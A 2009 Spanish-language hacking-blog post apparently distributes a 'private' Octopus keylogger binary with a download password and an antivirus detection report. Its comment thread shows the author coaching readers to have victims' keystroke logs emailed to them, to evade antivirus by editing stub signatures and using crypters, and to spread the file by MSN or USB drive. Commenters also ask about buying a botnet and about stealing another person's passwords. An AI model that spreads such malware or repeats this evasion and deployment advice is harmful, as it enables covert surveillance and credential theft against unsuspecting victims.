18 de septiembre de 2009

Octopus Keylogger versión privada liberada!

Bueno hago publica la versión privada por su detectabilidad ya que no se vende mas este keylogger, asi que aqui os lo dejo con bastantes funciones para ir investigando.



File Info

Report generated: 23.11.2009 at 1.03.21 (GMT 1)
Filename: Server.exe
File size: 53528
MD5 Hash: f31d6d72bbb40f35a88345a3a2bb5603
SHA1 Hash: 1DECA55B019279D48C8EDFC06EBCA3DCF5350070
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 13 on 24

Detections

a-squared - Trojan.Win32.Swisyn!IK
Avira AntiVir - TR/Swisyn.oxz
Avast - Win32:Trojan-gen
AVG - Generic14.AXCK
BitDefender - Trojan.Generic.2475322
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - Trojan.Win32.Swisyn.oxz A
Ikarus T3 - Trojan.Win32.Swisyn
Kaspersky - Trojan.Win32.Swisyn.oya
McAfee - -
NOD32 v3 - Win32/Injector.YL
Norman - Trojan W32/Smalltroj.SDGU
Panda - -
QuickHeal - -
Solo Antivirus - Trojan.Win32.Swisyn.Oxz
Sophos - Sus/VB-BD
TrendMicro - -
VBA32 - -
VirusBuster - Trojan.PWS.Octopu.A
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org



Descargar Octopus Keylogger versión privada (Binario)

Contraseña del fichero : www.scblabsteam.blogspot.com

SharkI.

29 comentarios:

Anónimo dijo...

men una bot net a la venta no tienes por hay... Men tu sabes hacer bot nets yo te digo como la quiero y me dices cuanto es el precio

SCB Lab's dijo...

Anonimo, estoy en varios proyectos como puedes ver en otros temas posteados, cuando termine uno le haré el hueco para la botnet..

Un saludo!

Anónimo dijo...

ok mijo esa es la actitud seria bueno que hagas una

Anónimo dijo...

Disculpa, pero lo uso y no me sirve

Unknown dijo...

disculpa sharki aver mira la opcion de desabilitar taskmanager como lo vuelvo a habilitar??

Anónimo dijo...

ola wenas gracias x tu tutorial de exes me encanto segui todo me lo lei 2 veces xD q ya es bastante xD te iva a comentar q el octopus me da este error : Run-time `error 13` type mismatch gracias

SCB Lab's dijo...

Oscar, tienes que entrar desde modo seguro y quitar el run desde msconfig.

Anónimo, si te estás refiriendo al tutorial de cLn entonces.. fijate sino rompistes el stub, lo que tienes que hacer es modificarlo y luego meterlo de nuevo al cliente con un editor de recursos, luego lo usas normal.

SharkI.

Anónimo dijo...

sharki soy el anonimo q va despues de oscar gracias por la respuesta pero averige q se trata de que cuando lo intento abrir en la mk virtual con avg me salta este error run-time error `75`path/file access error y cuando lo abro en la otra con avast se abre sin mas sin dar error... sera el AV gracias el richa!

Anónimo dijo...

sharky el binder diamon que es lo q tengo q modificar para no ser detectado, la firma... el q? gracias de antemano

SCB Lab's dijo...

Por favor hagan los comentarios en sus respectivos lugares, yo paso siempre por todos los temas para ver si hay nuevos comentarios.

Anónimo, tienes que modificar las firmas del 'stub' si te leistes el Metodo hexadecimal de cLn lo entenderás.

SharkI.

Tomás Díaz dijo...

Tengo un problema cuando intento abrir recién el archivo, de verdad no sé qué pasa, pero intento abrirlo y me aparece un mensaje de diagnóstico de Winrar. ¿qué se hace?

SCB Lab's dijo...

No tengo idea, pero eso es un error del winrar en todo caso te dejo aqui unos links haber si te ayudan :

http://www.forosdelweb.com/f23/error-lectura-archivo-rar-583940/

http://foro.el-hacker.com/index.php/topic,108171.5/wap2.html


Puede ser también por el antivirus, desactivalo.

Un saludo!

SharkI.

Anónimo dijo...

Hola una pregunta el server de este keylogger se puede encriptar, gracias cordiales saludos.

Anónimo dijo...

que receptor? es que lo pongo para que me lo envie a gmail pero quiero saber que es eso de receptor

SCB Lab's dijo...

Anónimo 1 : el servidor se puede encriptar siempre y cuando un crypter soporte EOF y marcando la casilla EOF.

Anónimo 2 : el receptor es el que recibirá los logs, osea, tu e-mail.

Anónimo dijo...

Hola una pregunta el downloader funciona solamente al ejecutar el servidor por primera vez o se puede usar el cualquie momento mientras la victima este infectada, gracias.

SCB Lab's dijo...

Anónimo, solo se ejecuta al abrir el archivo.

SharkI.

Anónimo dijo...

Hola,, es muy bueno este keylogger,, lo estuve probando a nivel local,, pero ahora quiero instalarlo en otra pc,, me podrias decir es la correcta configuracion para enviar los logs a mi correo porfa?,, muchas gracias

SCB Lab's dijo...

Anónimo, seleccionas la casilla de E-mail, metes tus datos para iniciar la sesión en el envio, en receptor pones el e-mail que recibirá los logs y configuras lo demás, si no usas el FTP no lo actives, igual que la infección P2P

Saludos!

Anónimo dijo...

Hola,, tambien etoy interesado en usar este keylogger de manera remota, pero aparte de la direccion de correo hay que configurar algo mas?...

a y otra pregunta como se hace para que se ejecute al iniciar wuindows...

ooo si podrian darme un link o algo en donde pueda encontrar un tutorial de uso...

Muchas gracias por su atencion.

SCB Lab's dijo...

Haría el tutorial pero no tengo tiempo, pregunta en algún foro grande y por ahí lo hacen.

Saludos!

Anónimo dijo...

como se puede parar o eliminar de la computadora infectada???

♠JuanUk♠ dijo...

Me da un ERROR cuando termino de crear el Servidor....
RuntimeError File not found 53

♠JuanUk♠ dijo...

Solucionado....

Twins dijo...

Y a pensado en hacer una segunda vercion de este keylogger? saludos.

Xombra dijo...

no entiendo ..porq!?? fuck prueban los archivos en NoVirusThanks.org
si saben que al sgte dia ya todos los antivirus detectaran el programa.....pero bueno
habra q tomar mas tiempo para dejarlo indetectable

MariaPaula dijo...

Con este keylogger puedo mandar una archivo a una máquina de otra persona y así saber sus contraseñas y demás?. Haciendo eso, no estoy infectando mi máquina también? Y cómo hago para infectar otra máquina sin infectar la mía?

Twins dijo...

MariaPaula no puedes infectar tu pc al crear un servidor a menos que el cliente este infectado o que abras el servidor q craste, para enviarlo a otros pc lo envias por msn, pendrive etc. Siempre y cuando este bien protegido de los antivirus.

Xombra dijo...

Porfavor podrian volver a subir este keylogger pu8edo decir q es el mas util q e probado muy estable ]
se encripta muy bien
lo q pasa es q por error perdi el instalador
mi mail Rr_bUg32@hotmail.com